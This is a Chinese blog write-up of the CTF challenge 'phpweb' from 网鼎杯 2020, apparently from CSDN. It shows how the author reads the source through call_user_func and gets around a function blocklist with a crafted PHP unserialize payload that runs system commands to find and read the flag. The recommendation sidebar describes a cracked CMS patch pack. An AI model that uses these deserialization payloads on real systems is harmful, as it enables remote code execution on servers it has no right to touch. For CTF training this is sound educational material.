[网鼎杯 2020 朱雀组]phpweb

最新推荐文章于 2022-05-09 18:22:55 发布
最新推荐文章于 2022-05-09 18:22:55 发布
阅读量211 收藏 1
点赞数
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/120840614
版权

文章目录

题目

链接:https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E6%9C%B1%E9%9B%80%E7%BB%84]phpweb

解答

1、打开网页,出现一张图片和一对英文,首先F12查看一波源码
在这里插入图片描述
存在表单,而且为post提交,那就抓包分析

2、存在两个参数
在这里插入图片描述
尝试更改参数看返回的内容是否会不一样
3、将func改成aaa试一下
在这里插入图片描述
返回的内容
在这里插入图片描述
意思就是aaa没有找到或者这是一个不合法的文件名
同时发现了一个重要的函数call_user_func(),具体功能见知识点总结
瞬间打通了思路,func是php中内置的函数,p是参数,执行的结果会显示在p标签当中
验证一下:
在这里插入图片描述
在这里插入图片描述
4、那就尝试一下命令执行函数
在这里插入图片描述
在这里插入图片描述
应该能料到,这些函数应该会被过滤掉,不然哪有这么简单
我还是试了其他的,万一有一个漏网之鱼呢,结果没有
5、思路打开,既然可以执行命令,那我读取一下源码,file_get_content总没有过滤吧

func=file_get_contents&p=index.php

得到index.php源码

<?php
    $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk",  "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
    function gettime($func, $p) {
        $result = call_user_func($func, $p);
        $a= gettype($result);
        if ($a == "string") {
            return $result;
        } else {return "";}
    }
    class Test {
        var $p = "Y-m-d h:i:s a";
        var $func = "date";
        function __destruct() {
            if ($this->func != "") {
                echo gettime($this->func, $this->p);
            }
        }
    }
    $func = $_REQUEST["func"];
    $p = $_REQUEST["p"];

    if ($func != null) {
        $func = strtolower($func);
        if (!in_array($func,$disable_fun)) {
            echo gettime($func, $p);
        }else {
            die("Hacker...");
        }
    }
?>

果不其然,过滤的比我想象的要多
6、分析源码,思路继续打开,发现一个类,是否可以尝试反序列化
分析过程,首先输入func和p,其中func是unserialize,p是序列化后的结果
执行gettime函数,得到了一个反序列化后的对象,在创建对象后会自动调用__destruct销毁,再继续调用gettime函数,从而能够执行得到结果。
构造exp

<?php
    class test{
    	var $func="system";
    	var $p = "ls";
    }
    $a = new test();
    $aa = serialize($a);
    echo $aa;
?>

在本地搭建环境执行得到结果
故尝试

func=unserialize&p=O:4:"test":2:{s:4:"func";s:6:"system";s:1:"p";s:2:"ls";}

在这里插入图片描述
7、继续构造

func=unserialize&p=O:4:"test":2:{s:4:"func";s:6:"system";s:1:"p";s:18:"find / -name flag*";}

寻找有关与flag的文件,等待一段时间
在这里插入图片描述
继续构造

func=unserialize&p=O:4:"test":2:{s:4:"func";s:6:"system";s:1:"p";s:22:"cat /tmp/flagoefiu4r93";}

得到结果
在这里插入图片描述
flag{5f916313-bde1-4dca-ba69-a9af7fa78725}
完成!

知识点

1、call_user_func用法
call_user_func(callable $callback, mixed $parameter = ?, mixed $... = ?): mixed
第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。
链接:https://www.php.net/manual/zh/function.call-user-func.php

2、序列化与反序列化知识点见后期文章

DiliLearngent
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2020 朱雀]phpweb 1
weixin_53150482的博客
07-13 449
[网鼎杯 2020 朱雀]phpweb 1
buuctf-[网鼎杯 2020 朱雀]phpweb
最新发布
2202_75317918的博客
09-21 339
buuctf-[网鼎杯 2020 朱雀]phpweb
BUUCTF——phpweb
weixin_45864041的博客
04-17 611
打开题目 可以看到页面上的时间每5秒刷新一次,所以我们直接抓包看页面的数据提交 由页面提交的两个参数可以看到,第一个func是函数名,第二个是传入函数的参数。 所以可以用php的readfile()函数读取index.php的源码。 <?php $disable_fun = array("exec","shell_exec","system","passthru", "proc_open","show_source","phpinfo","popen","dl","eval", "
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
网鼎2020-朱雀.rar
05-24
网鼎2020-朱雀.rar除了web
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
09-11
2022年第三届“网鼎杯”网络安全大赛(朱雀)部分题目附件
Opera中国版(朱雀版) v12.02
11-05
Opera 是来自挪威的一个极为出色的网络浏览套件,具有速度快、节省系统资源、定制能力强、安全性高以及体积小等特点,目前已经是广受欢迎的浏览器之一。... 在中国用户浏览器使用习惯研究和社区反馈的基础上,我们对 ...
PHPWEB后台漂亮登陆界面【亲测可用可修改DIY_20140417】
04-18
【信易说明】 本为提取的PHPWEB后台漂亮登陆界面补丁,直接复制到根目录就好。 如果你要在登陆页面加自己的信息,PS这个图base\templates\images\main.jpg就好了。 信易工作室 2014-04-17
phpweb全能破解含10月19日前所有63个升级包(安装+2.0.14升级+模板安装免验证+upupup数据库备份
10-25
信易phpweb全能补丁包 I:\陈君毅个人文档\陈君毅的事业\制作网站项目\PHPWEB\升级破解补丁\信易,陈君毅,验证,能用好用的补丁\全能破解(安装+2.0.14升级+模板安装免验证) ├─base │ ├─admin-post.php 【模板升级免验证破解】 免验证增加模板后,需要添加权限 │ ├─install-index.php 【安装跳第三步破解】 第二十行的 $step=0 修改为$step=3 。 修改为3的意思是从第三步开始。 │ └─templates-header.htm 【IE6的兼容性补丁】 修改浏览器的兼容性问题,增加了一句<meta http-equiv="X-UA-Compatible" content="IE=7" /> ├─includes-update.php 【升级包安装补丁】 第150行为密码123456。原来个别补丁更新后会覆盖本文件,需要再上传本update.php方可继续安装下一升级包,现在信易已更新补丁包,可一直安装无需再上传。 └─update 【升级包源文件2.05】 更新至2.0.14版,20121019,已修正20100830和20111209的update.php,无需中途再上传update.php。只上传要用的升级包到服务器,即可。 └─upupup 【冰蓝PhpwebBak 2011】 备份数据库的工具,用户名:admin class/config.php,“$set_password”的值改为“e10adc3949ba59abbe56e057f20f883e”,密码就是:123456。 www.ebcm.com.cn ========================================================================================================================================================================================================================================================================================================================= 【post.php详细说明】好不容易给客户架设后了一个成品网站,客户提出要增加会员功能,这可愁坏我了,因为之前这套模板里面是没有会员等模块,怎么办呢,重新换版子?那太累了,数据都要重新添加(BS一下,其他模板程序都是数据和模板分离)。幸好程序提供了添加功能。好了,成都网站建设专家-易维网络特意总结了一下详细步骤,希望能帮到一些人: 把要安装的模块的文件先传到网站根目录。这里有人就说我没有文件怎么办,可以去其他模板下面下载下来。会员的文件夹名称是member,下载是down。 后台-设置-模块插件管理,点击右边的“查询未安装模块”,下拉选择要安装的模块。这一步会提示需要用户名验证:1,找卖给你程序的人,他们有会员账号。2,给他破解了。base\admin下面的post.php,这个文件,破解后的文件为: 把这个文件替换上去就OK了,但是点击会员模块的时候还会提示无权操作。解决方法:设置-管理账户维护,把帐号的权限下面的会员相关都打上勾。 附上一些内部网址的地址,在网站制作的时候用得上: 1、会员模块 会员中心:member/index.php 会员资料设置 member/member_account.php 登录账号设置 member/member_account.php 会员资料修改 member/member_detail.php 头像签名设置 member/member_person.php 联系信息修改 member/member_contact.php 我的收藏夹 member/member_fav.php 我的点评 member/member_comment.php 我的好友 member/member_friends.php 我的积分 member/member_cent.php 我的站内短信 member/member_msn.php 安全退出登录 logout.php 会员付款记录 member/member_paylist.php 会员消费记录 member/member_buylist.php 在线支付充值 member/member_onlinepay.php 2、新闻文章模块 文章分类 news/news_cat.php 文章发布 news/news_fabu.php 文章管理 news/news_gl.php 3、图片展示模块 图片分类 photo/photo_cat.php 图片发布 photo/photo_fabu.php 图片管理 photo/photo_gl.php 4、产品展示模块 产品分类 product/product_cat.php 产品发布 product/product_fabu.php 产品管理 product/product_gl.php 5、文件下载模块 下载分类 down/down_cat.php 下载发布 down/down_fabu.php 下载管理 down/down_gl.php 6、客户服务模块 提交我的问题 service/service.php 客服工单查询 service/feedback.php 存档工单查询 service/feedbackhis.php 7、网上购物模块 订单查询 shop/order.php 8、医院门诊模块 门诊预约管理 hospital/hospital_reservenotice.php 网上预约挂号 hospital/hospital_reserve.php 预约挂号查询 hospital/hospital_reservemanage.php 历史预约记录 hospital/hospital_reservedue.php 9、供求信息模块 信息自定分类 bizinfo_cat.php 供求信息管理 bizinfo/bizinfo_fabu.php 供求信息发布 bizinfo/bizinfo_fabu.php 供求信息管理 bizinfo_gl.php 10、技术信息模块 技术项目发布 tech/techadd.php 技术需求发布 tech/techdemandadd.php 项目信息管理 tech/techgl.php 需求信息管理 tech/techdemandgl.php 11、展会信息模块 加入公司名录 zlinfo/zlinfo_comadd.php 展会信息发布 zlinfo/zlinfo_add.php 展会信息管理 zlinfo/zlinfo_gl.php 展览场馆发布 zlinfo/zlinfo_cgadd.php 展览场馆管理 zlinfo/zlinfo_cggl.php 服务信息发布 zlinfo/zlinfo_fuwuadd.php 服务信息管理 zlinfo/zlinfo_fuwugl.php 参展申请查询 zlinfo/zlinfo_sq.php =========================================================================================================================================================================================================================================================================================================================
[网鼎杯 2020 朱雀]之phpweb两种不同的解题方式
sGanYu
10-21 8566
目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回显时间,并且网页每隔一段时间会刷新一次,频率大概五秒一次 F12查看源码,和观察的一样,setTimeout("document.form1.submit()",5000)每隔五秒钟将会提交一次form1,然后是一串时间字符串2021-10-20 12:14:50 pm .
8月8日刷题
Realiy的博客
08-08 377
[网鼎杯 2020 朱雀]phpweb f12发现有post数据 hackbar看一下 是call_user_func()函数,用file_get_contents读取一下index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate",
BUUCTF - Web - PHP
1tachi的博客
11-27 451
敏感文件泄露 访问www.zip 解压 class.php中是PHP源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = .
php第一章:2.Web程序的访问流程
要思考,要努力
05-09 1117
总览1.web分为两类:静态网站和动态网站2.web程序的访问流程3.URL一、静态网站的访问流程1.URL简介URL(uniformed Resource Location):统一资源定位。它其实就是我们在互联网上的绝对路径。 2.URL解析 本地DNS服务器进行URL解析,本地的DNS是在hosts文件中,写入了IP和DNS的一些映射关系。如果我们没有在本地DNS服务器中找到这种对应关系,就会去网络DNS服务器去找。 3.Apache的工作流程 在我们通过IP找到服务器后,通过端口访问Apa
php web 开发教程,PHP 系列:PHP Web 开发基础,phpweb_PHP教程
weixin_42447265的博客
03-11 1136
PHP 系列:PHP Web 开发基础,phpwebPHP是动态类型的Web开发的脚本语言,PHP以页面文件作为加载和运行的单元,PHP现在有了Composer作为开发包管理。1.使用Composer管理依赖自从.NET开发用了Nuget管理程序集依赖,我就再也离不开它了,幸亏Java中也有Maven管理jar包,虽然开源中国的镜像太慢但还有ibiblio的镜像可用,PHP现在终于有了Compos...
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4140
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值